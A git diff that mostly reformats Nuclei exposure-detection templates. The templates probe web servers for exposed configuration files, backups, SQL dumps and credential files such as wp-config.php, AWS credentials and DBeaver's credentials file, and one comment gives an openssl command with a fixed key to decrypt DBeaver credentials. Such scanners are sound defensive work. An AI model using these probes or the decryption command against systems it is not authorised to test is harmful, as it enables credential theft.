a/http/exposures/apis/jeecg-boot-swagger.yaml +++ b/http/exposures/apis/jeecg-boot-swagger.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" tags: jeecg,swagger,detect,exposure diff --git a/http/exposures/apis/openapi.yaml b/http/exposures/apis/openapi.yaml index 630faab77b..8caeb50199 100644 --- a/http/exposures/apis/openapi.yaml +++ b/http/exposures/apis/openapi.yaml @@ -9,11 +9,11 @@ info: - https://www.openapis.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: exposure,api metadata: max-request: 1 + tags: exposure,api http: - method: GET diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml index 57a89a448d..2dc4a9a257 100644 --- a/http/exposures/apis/seafile-api.yaml +++ b/http/exposures/apis/seafile-api.yaml @@ -11,8 +11,8 @@ info: - https://manual.seafile.com/ - https://www.seafile.com/en/home/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"seafile" tags: exposure,api,detect diff --git a/http/exposures/apis/strapi-page.yaml b/http/exposures/apis/strapi-page.yaml index 2512f1472d..57c004f674 100644 --- a/http/exposures/apis/strapi-page.yaml +++ b/http/exposures/apis/strapi-page.yaml @@ -8,7 +8,7 @@ info: reference: https://strapi.io/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposures/apis/swagger-api.yaml b/http/exposures/apis/swagger-api.yaml index b94a8d6dab..6621fe2127 100644 --- a/http/exposures/apis/swagger-api.yaml +++ b/http/exposures/apis/swagger-api.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 54 shodan-query: http.title:"swagger" - verified: true tags: exposure,api,swagger http: @@ -75,8 +75,8 @@ http: headers: Accept: text/html - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/apis/wadl-api.yaml b/http/exposures/apis/wadl-api.yaml index 657dd5eb5a..612f145175 100644 --- a/http/exposures/apis/wadl-api.yaml +++ b/http/exposures/apis/wadl-api.yaml @@ -10,11 +10,11 @@ info: - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: exposure,api metadata: max-request: 8 + tags: exposure,api http: - method: GET diff --git a/http/exposures/apis/wsdl-api.yaml b/http/exposures/apis/wsdl-api.yaml index 65b9337cdc..0e119cee38 100644 --- a/http/exposures/apis/wsdl-api.yaml +++ b/http/exposures/apis/wsdl-api.yaml @@ -8,16 +8,17 @@ info: reference: https://www.w3.org/TR/wsdl/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: exposure,api metadata: max-request: 1 + tags: exposure,api http: - method: GET path: - "{{BaseURL}}/?wsdl" + matchers: - type: word words: diff --git a/http/exposures/backups/exposed-mysql-initial.yaml b/http/exposures/backups/exposed-mysql-initial.yaml index b2655730ca..d3e4b9dca9 100644 --- a/http/exposures/backups/exposed-mysql-initial.yaml +++ b/http/exposures/backups/exposed-mysql-initial.yaml @@ -9,11 +9,11 @@ info: - https://hackerone.com/reports/1081817 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,hackerone metadata: max-request: 1 + tags: config,exposure,hackerone http: - method: GET diff --git a/http/exposures/backups/froxlor-database-backup.yaml b/http/exposures/backups/froxlor-database-backup.yaml index 3a84e692b1..e9ee823d7c 100644 --- a/http/exposures/backups/froxlor-database-backup.yaml +++ b/http/exposures/backups/froxlor-database-backup.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Froxlor Server Management Panel" tags: froxlor,backup,exposure,disclosure diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index f3e9111138..5484dfc0e3 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -16,34 +16,34 @@ http: attack: clusterbomb payloads: filepath: - - /wp-config.php # wordpress - - /wp-config # wordpress - - /site/default/settings.php # drupal - - /installation/configuration.php # joomla - - /app/etc/env.php # magento - - /Application/Common/Conf/config.php # thinkphp - - /environments/dev/common/config/main-local.php # yii - - /environments/prod/common/config/main-local.php # yii - - /common/config/main-local.php # yii - - /system/config/default.php # opencart - - /typo3conf/localconf.php # typo3 - - /config/config_global.php # discuz - - /config/config_ucenter.php # discuz - - /textpattern/config.php # textpattern - - /data/common.inc.php # dedecms - - /caches/configs/database.php # phpcms - - /caches/configs/system.php # phpcms - - /include/config.inc.php # phpcms - - /include/config.php # xbtit - - /includes/config.php # vbulletin + - /wp-config.php # wordpress + - /wp-config # wordpress + - /site/default/settings.php # drupal + - /installation/configuration.php # joomla + - /app/etc/env.php # magento + - /Application/Common/Conf/config.php # thinkphp + - /environments/dev/common/config/main-local.php # yii + - /environments/prod/common/config/main-local.php # yii + - /common/config/main-local.php # yii + - /system/config/default.php # opencart + - /typo3conf/localconf.php # typo3 + - /config/config_global.php # discuz + - /config/config_ucenter.php # discuz + - /textpattern/config.php # textpattern + - /data/common.inc.php # dedecms + - /caches/configs/database.php # phpcms + - /caches/configs/system.php # phpcms + - /include/config.inc.php # phpcms + - /include/config.php # xbtit + - /includes/config.php # vbulletin - /includes/config # vbulletin - - /phpsso_server/caches/configs/database.php # phpcms - - /phpsso_server/caches/configs/system.php # phpcms - - /zb_users/c_option.php # zblog - - /e/class/config.php # empirecms - - /e/config/config.php # empirecms - - /data/sql_config.php # phpwind - - /data/bbscache/config.php # phpwind + - /phpsso_server/caches/configs/database.php # phpcms + - /phpsso_server/caches/configs/system.php # phpcms + - /zb_users/c_option.php # zblog + - /e/class/config.php # empirecms + - /e/config/config.php # empirecms + - /data/sql_config.php # phpwind + - /data/bbscache/config.php # phpwind - /db.php - /conn.php - /database.php @@ -63,7 +63,6 @@ http: - /config.php - /config - /const.DB.php.bak - bakext: - ".~" - ".bk" diff --git a/http/exposures/backups/settings-php-files.yaml b/http/exposures/backups/settings-php-files.yaml index 8948f6e751..ddcb54e691 100644 --- a/http/exposures/backups/settings-php-files.yaml +++ b/http/exposures/backups/settings-php-files.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,backup metadata: max-request: 6 + tags: exposure,backup http: - method: GET diff --git a/http/exposures/backups/sql-dump.yaml b/http/exposures/backups/sql-dump.yaml index 25bdffd07d..86ddbb972f 100644 --- a/http/exposures/backups/sql-dump.yaml +++ b/http/exposures/backups/sql-dump.yaml @@ -9,10 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,backup,mysql metadata: max-request: 20 - + tags: exposure,backup,mysql http: - method: GET @@ -37,10 +36,11 @@ http: - "{{BaseURL}}/users.sql" - "{{BaseURL}}/wp-content/uploads/dump.sql" - "{{BaseURL}}/wp-content/mysql.sql" + headers: Range: "bytes=0-3000" + max-size: 2000 # Size in bytes - Max Size to read from server response - max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: regex diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 3973677306..2f1e6fb4cc 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -21,12 +21,12 @@ http: attack: clusterbomb payloads: FILENAME: - - "{{FQDN}}" # www.example.com - - "{{RDN}}" # example.com - - "{{DN}}" # example - - "{{SD}}" # www - - "{{date_time('%Y')}}" # 2023 - - "ROOT" # tomcat + - "{{FQDN}}" # www.example.com + - "{{RDN}}" # example.com + - "{{DN}}" # example + - "{{SD}}" # www + - "{{date_time('%Y')}}" # 2023 + - "ROOT" # tomcat - "wwwroot" - "htdocs" - "www" @@ -46,7 +46,6 @@ http: - "old" - "Release" - "inetpub" - EXT: - "7z" - "bz2" @@ -73,23 +72,23 @@ http: - "sql.z" - "sql.tar.z" - "war" + max-size: 500 # Size in bytes - Max Size to read from server response - max-size: 500 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: binary binary: - - "377ABCAF271C" # 7z - - "314159265359" # bz2 - - "53514c69746520666f726d6174203300" # SQLite format 3. - - "1f8b" # gz tar.gz - - "526172211A0700" # rar RAR archive version 1.50 - - "526172211A070100" # rar RAR archive version 5.0 - - "FD377A585A0000" # xz tar.xz - - "1F9D" # z tar.z - - "1FA0" # z tar.z - - "4C5A4950" # lz - - "504B0304" # zip + - "377ABCAF271C" # 7z + - "314159265359" # bz2 + - "53514c69746520666f726d6174203300" # SQLite format 3. + - "1f8b" # gz tar.gz + - "526172211A0700" # rar RAR archive version 1.50 + - "526172211A070100" # rar RAR archive version 5.0 + - "FD377A585A0000" # xz tar.xz + - "1F9D" # z tar.z + - "1FA0" # z tar.z + - "4C5A4950" # lz + - "504B0304" # zip condition: or part: body diff --git a/http/exposures/configs/accueil-wampserver.yaml b/http/exposures/configs/accueil-wampserver.yaml index dc9490544f..7f55530372 100644 --- a/http/exposures/configs/accueil-wampserver.yaml +++ b/http/exposures/configs/accueil-wampserver.yaml @@ -13,8 +13,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Accueil WAMPSERVER" tags: exposure,accueil,wampserver,config diff --git a/http/exposures/configs/airflow-configuration-exposure.yaml b/http/exposures/configs/airflow-configuration-exposure.yaml index bea6df0b6c..6f13847d84 100644 --- a/http/exposures/configs/airflow-configuration-exposure.yaml +++ b/http/exposures/configs/airflow-configuration-exposure.yaml @@ -9,14 +9,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config,airflow,apache metadata: max-request: 1 + tags: exposure,config,airflow,apache http: - method: GET path: - '{{BaseURL}}/airflow.cfg' + matchers: - type: word words: diff --git a/http/exposures/configs/alibaba-canal-info-leak.yaml b/http/exposures/configs/alibaba-canal-info-leak.yaml index 1a043511d1..a403a327ef 100644 --- a/http/exposures/configs/alibaba-canal-info-leak.yaml +++ b/http/exposures/configs/alibaba-canal-info-leak.yaml @@ -11,16 +11,17 @@ info: - https://my.oschina.net/u/4581879/blog/4753320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,alibaba metadata: max-request: 1 + tags: config,exposure,alibaba http: - method: GET path: - "{{BaseURL}}/api/v1/canal/config/1/1" + headers: Content-Type: application/json @@ -29,11 +30,13 @@ http: - type: status status: - 200 + - type: word words: - "application/json" condition: and part: header + - type: word words: - "ncanal.aliyun.accessKey" diff --git a/http/exposures/configs/amazon-docker-config.yaml b/http/exposures/configs/amazon-docker-config.yaml index 0c88fddc29..eb7d09800f 100644 --- a/http/exposures/configs/amazon-docker-config.yaml +++ b/http/exposures/configs/amazon-docker-config.yaml @@ -9,14 +9,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,aws,devops metadata: max-request: 1 + tags: config,exposure,aws,devops http: - method: GET path: - '{{BaseURL}}/Dockerrun.aws.json' + matchers: - type: word words: diff --git a/http/exposures/configs/ansible-config-disclosure.yaml b/http/exposures/configs/ansible-config-disclosure.yaml index 64acb996f5..b0f2984848 100644 --- a/http/exposures/configs/ansible-config-disclosure.yaml +++ b/http/exposures/configs/ansible-config-disclosure.yaml @@ -9,14 +9,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET path: - '{{BaseURL}}/ansible.cfg' + matchers: - type: word words: diff --git a/http/exposures/configs/apache-config.yaml b/http/exposures/configs/apache-config.yaml index a83efe2810..ae06c62df0 100644 --- a/http/exposures/configs/apache-config.yaml +++ b/http/exposures/configs/apache-config.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,apache metadata: max-request: 1 + tags: config,exposure,apache http: - method: GET diff --git a/http/exposures/configs/appspec-yml-disclosure.yaml b/http/exposures/configs/appspec-yml-disclosure.yaml index ed2cc4b5bf..97782f43ce 100644 --- a/http/exposures/configs/appspec-yml-disclosure.yaml +++ b/http/exposures/configs/appspec-yml-disclosure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config metadata: max-request: 2 + tags: exposure,config http: - method: GET diff --git a/http/exposures/configs/appveyor-configuration-file.yaml b/http/exposures/configs/appveyor-configuration-file.yaml index c3b3190219..95bf557043 100644 --- a/http/exposures/configs/appveyor-configuration-file.yaml +++ b/http/exposures/configs/appveyor-configuration-file.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"appveyor.yml" tags: config,exposure,devops @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/appveyor.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/aws-config.yaml b/http/exposures/configs/aws-config.yaml index 0b74c5e270..3ddf9f482f 100644 --- a/http/exposures/configs/aws-config.yaml +++ b/http/exposures/configs/aws-config.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: config,exposure,aws,credential http: diff --git a/http/exposures/configs/aws-credentials.yaml b/http/exposures/configs/aws-credentials.yaml index a1d4a7aceb..9d86b2da86 100644 --- a/http/exposures/configs/aws-credentials.yaml +++ b/http/exposures/configs/aws-credentials.yaml @@ -12,8 +12,8 @@ info: cvss-score: 9.4 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: config,exposure,aws,credential http: diff --git a/http/exposures/configs/awstats-config.yaml b/http/exposures/configs/awstats-config.yaml index f43bc51eae..f43cfe0f7d 100644 --- a/http/exposures/configs/awstats-config.yaml +++ b/http/exposures/configs/awstats-config.yaml @@ -8,11 +8,11 @@ info: reference: https://www.awstats.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,awstats metadata: max-request: 2 + tags: config,exposure,awstats http: - method: GET diff --git a/http/exposures/configs/awstats-script.yaml b/http/exposures/configs/awstats-script.yaml index 0c21433c1a..429849e6d5 100644 --- a/http/exposures/configs/awstats-script.yaml +++ b/http/exposures/configs/awstats-script.yaml @@ -8,11 +8,11 @@ info: reference: https://www.awstats.org/docs/awstats_setup.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,awstats metadata: max-request: 3 + tags: config,exposure,awstats http: - method: GET diff --git a/http/exposures/configs/azure-domain-tenant.yaml b/http/exposures/configs/azure-domain-tenant.yaml index 3a0a09b9d0..86c26a482b 100644 --- a/http/exposures/configs/azure-domain-tenant.yaml +++ b/http/exposures/configs/azure-domain-tenant.yaml @@ -9,11 +9,11 @@ info: - https://azure.microsoft.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: azure,microsoft,cloud,exposure metadata: max-request: 1 + tags: azure,microsoft,cloud,exposure http: - raw: diff --git a/http/exposures/configs/babel-config-exposure.yaml b/http/exposures/configs/babel-config-exposure.yaml index 1e172a5a6b..f8b88e727c 100644 --- a/http/exposures/configs/babel-config-exposure.yaml +++ b/http/exposures/configs/babel-config-exposure.yaml @@ -9,11 +9,11 @@ info: - https://babeljs.io/docs/en/configuration classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"babel.config.js" tags: exposure,config,file diff --git a/http/exposures/configs/behat-config.yaml b/http/exposures/configs/behat-config.yaml index 21ad44322e..a8ea6e13f7 100644 --- a/http/exposures/configs/behat-config.yaml +++ b/http/exposures/configs/behat-config.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"behat.yml" tags: exposure,behat,devops,cicd @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/behat.yml.dist" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/blazor-boot.yaml b/http/exposures/configs/blazor-boot.yaml index a5f8678e3a..5ed2fecb10 100644 --- a/http/exposures/configs/blazor-boot.yaml +++ b/http/exposures/configs/blazor-boot.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/freakyclown/Nuclei_templates/blob/main/blazor_server.yaml metadata: - max-request: 1 verified: true + max-request: 1 github-query: 'blazor.boot.json language:JSON' tags: blazor,boot,exposure,config,disclosure diff --git a/http/exposures/configs/cakephp-config.yaml b/http/exposures/configs/cakephp-config.yaml index 8e2fe6d015..d9580d2b9d 100644 --- a/http/exposures/configs/cakephp-config.yaml +++ b/http/exposures/configs/cakephp-config.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"phinx.yml" tags: files,exposure,config @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/phinx.yaml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/cgi-printenv.yaml b/http/exposures/configs/cgi-printenv.yaml index d1d50f42f4..a1134b9e6e 100644 --- a/http/exposures/configs/cgi-printenv.yaml +++ b/http/exposures/configs/cgi-printenv.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,cgi metadata: max-request: 1 + tags: exposure,cgi http: - method: GET diff --git a/http/exposures/configs/circleci-config.yaml b/http/exposures/configs/circleci-config.yaml index 9271219b6f..8c00a49621 100644 --- a/http/exposures/configs/circleci-config.yaml +++ b/http/exposures/configs/circleci-config.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,circleci metadata: max-request: 1 + tags: config,exposure,circleci http: - method: GET diff --git a/http/exposures/configs/circleci-ssh-config.yaml b/http/exposures/configs/circleci-ssh-config.yaml index 3255b4f378..b800683690 100644 --- a/http/exposures/configs/circleci-ssh-config.yaml +++ b/http/exposures/configs/circleci-ssh-config.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,circleci metadata: max-request: 1 + tags: config,exposure,circleci http: - method: GET diff --git a/http/exposures/configs/cisco-network-config.yaml b/http/exposures/configs/cisco-network-config.yaml index 888218d5a8..eefd4948fc 100644 --- a/http/exposures/configs/cisco-network-config.yaml +++ b/http/exposures/configs/cisco-network-config.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/5430 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: exposure,cisco,edb,config metadata: max-request: 1 + tags: exposure,cisco,edb,config http: - method: GET diff --git a/http/exposures/configs/codeception-config.yaml b/http/exposures/configs/codeception-config.yaml index 81f0eb7dca..f501bec974 100644 --- a/http/exposures/configs/codeception-config.yaml +++ b/http/exposures/configs/codeception-config.yaml @@ -6,8 +6,8 @@ info: severity: low description: Codeception YAML configuration file was detected. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"codeception.yml" tags: exposure,devops,codeception,config,cicd diff --git a/http/exposures/configs/codeigniter-env.yaml b/http/exposures/configs/codeigniter-env.yaml index cbfb166afa..62bb3a545c 100644 --- a/http/exposures/configs/codeigniter-env.yaml +++ b/http/exposures/configs/codeigniter-env.yaml @@ -5,9 +5,9 @@ info: author: emenalf severity: high description: Codeigniter .env file was discovered. - tags: config,exposure,codeigniter metadata: max-request: 12 + tags: config,exposure,codeigniter http: - method: GET diff --git a/http/exposures/configs/collibra-properties.yaml b/http/exposures/configs/collibra-properties.yaml index a2e87b39db..eaeed24276 100644 --- a/http/exposures/configs/collibra-properties.yaml +++ b/http/exposures/configs/collibra-properties.yaml @@ -7,11 +7,10 @@ info: reference: - https://twitter.com/shaybt12/status/1662431219223605254 metadata: - max-request: 3 verified: true + max-request: 3 tags: exposure,config,collibra-properties,collibra - http: - method: GET path: @@ -20,6 +19,7 @@ http: - "{{BaseURL}}/src/collibra.properties" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/composer-config.yaml b/http/exposures/configs/composer-config.yaml index 4b60557a2f..2a80ea745f 100644 --- a/http/exposures/configs/composer-config.yaml +++ b/http/exposures/configs/composer-config.yaml @@ -8,11 +8,11 @@ info: reference: https://getcomposer.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 4 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/config-json.yaml b/http/exposures/configs/config-json.yaml index f8bcf36da8..fceb20135b 100644 --- a/http/exposures/configs/config-json.yaml +++ b/http/exposures/configs/config-json.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 4 verified: true + max-request: 4 github-query: filename:config.json tags: config,exposure,files @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/credentials/config.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/config-properties.yaml b/http/exposures/configs/config-properties.yaml index 7defa8fd7f..313bbbc3d4 100644 --- a/http/exposures/configs/config-properties.yaml +++ b/http/exposures/configs/config-properties.yaml @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/ui_config.properties" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposures/configs/config-rb.yaml b/http/exposures/configs/config-rb.yaml index 7c28e0e4b4..873c2e0faa 100644 --- a/http/exposures/configs/config-rb.yaml +++ b/http/exposures/configs/config-rb.yaml @@ -6,8 +6,8 @@ info: severity: unknown description: Multiple Ruby configuration files were detected. metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: html:"config.rb" tags: ruby,devops,exposure,config @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/assets/config.rb" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/configuration-listing.yaml b/http/exposures/configs/configuration-listing.yaml index 0e03175b53..cab39821ae 100644 --- a/http/exposures/configs/configuration-listing.yaml +++ b/http/exposures/configs/configuration-listing.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,listing,exposure,edb metadata: max-request: 1 + tags: config,listing,exposure,edb http: - method: GET diff --git a/http/exposures/configs/coremail-config-disclosure.yaml b/http/exposures/configs/coremail-config-disclosure.yaml index 0873fb4512..288211467c 100644 --- a/http/exposures/configs/coremail-config-disclosure.yaml +++ b/http/exposures/configs/coremail-config-disclosure.yaml @@ -7,9 +7,9 @@ info: description: Coremail configuration information was discovered. reference: - https://www.secpulse.com/archives/107611.html - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/cypress-web-config.yaml b/http/exposures/configs/cypress-web-config.yaml index 74eec6f178..a65b131a6e 100644 --- a/http/exposures/configs/cypress-web-config.yaml +++ b/http/exposures/configs/cypress-web-config.yaml @@ -7,11 +7,11 @@ info: description: Cypress Oxygen configuration page was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"PendingInstallVZW - Web Page Configuration" tags: exposure,cypress,pendinginstallvzw,config diff --git a/http/exposures/configs/dbeaver-credentials.yaml b/http/exposures/configs/dbeaver-credentials.yaml index ffb645b442..6b0ef067ea 100644 --- a/http/exposures/configs/dbeaver-credentials.yaml +++ b/http/exposures/configs/dbeaver-credentials.yaml @@ -9,10 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: exposure,dbeaver metadata: max-request: 2 - + tags: exposure,dbeaver variables: str: "{{rand_base(6)}}" @@ -21,14 +20,12 @@ http: - | GET /{{str}}.json HTTP/1.1 Host: {{Hostname}} - - | GET /.dbeaver/credentials-config.json HTTP/1.1 Host: {{Hostname}} # To decode the credentials file, use following command: # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null - matchers-condition: and matchers: - type: dsl diff --git a/http/exposures/configs/debug-vars.yaml b/http/exposures/configs/debug-vars.yaml index 1af9069af9..9c48ea6e9c 100644 --- a/http/exposures/configs/debug-vars.yaml +++ b/http/exposures/configs/debug-vars.yaml @@ -5,9 +5,9 @@ info: author: luqman severity: low description: Golang expvar function exposes multiple public variables via HTTP such as stack trace information and server operation counters. - tags: go,debug,exposure metadata: max-request: 1 + tags: go,debug,exposure http: - method: GET diff --git a/http/exposures/configs/detect-drone-config.yaml b/http/exposures/configs/detect-drone-config.yaml index 6d5d56e413..7238e0fcb9 100644 --- a/http/exposures/configs/detect-drone-config.yaml +++ b/http/exposures/configs/detect-drone-config.yaml @@ -7,9 +7,9 @@ info: description: Drone configuration was discovered. reference: - https://github.com/drone/drone - tags: config,exposure,drone metadata: max-request: 1 + tags: config,exposure,drone http: - method: GET @@ -24,6 +24,7 @@ http: - "name:" - "steps:" condition: and + - type: status status: - 200 diff --git a/http/exposures/configs/django-variables-exposed.yaml b/http/exposures/configs/django-variables-exposed.yaml index 3f1db9dc99..ddf0e5a42d 100644 --- a/http/exposures/configs/django-variables-exposed.yaml +++ b/http/exposures/configs/django-variables-exposed.yaml @@ -11,11 +11,11 @@ info: - https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework- classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: exposure,config,django http: diff --git a/http/exposures/configs/docker-compose-config.yaml b/http/exposures/configs/docker-compose-config.yaml index c6583854b0..7b26cc30de 100644 --- a/http/exposures/configs/docker-compose-config.yaml +++ b/http/exposures/configs/docker-compose-config.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,devops metadata: max-request: 7 + tags: config,exposure,devops http: - method: GET @@ -27,6 +27,7 @@ http: - "{{BaseURL}}/docker-compose.override.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: dsl diff --git a/http/exposures/configs/dockerfile-hidden-disclosure.yaml b/http/exposures/configs/dockerfile-hidden-disclosure.yaml index 2db469b714..ec25f315f8 100644 --- a/http/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/http/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config metadata: max-request: 2 + tags: exposure,config http: - method: GET diff --git 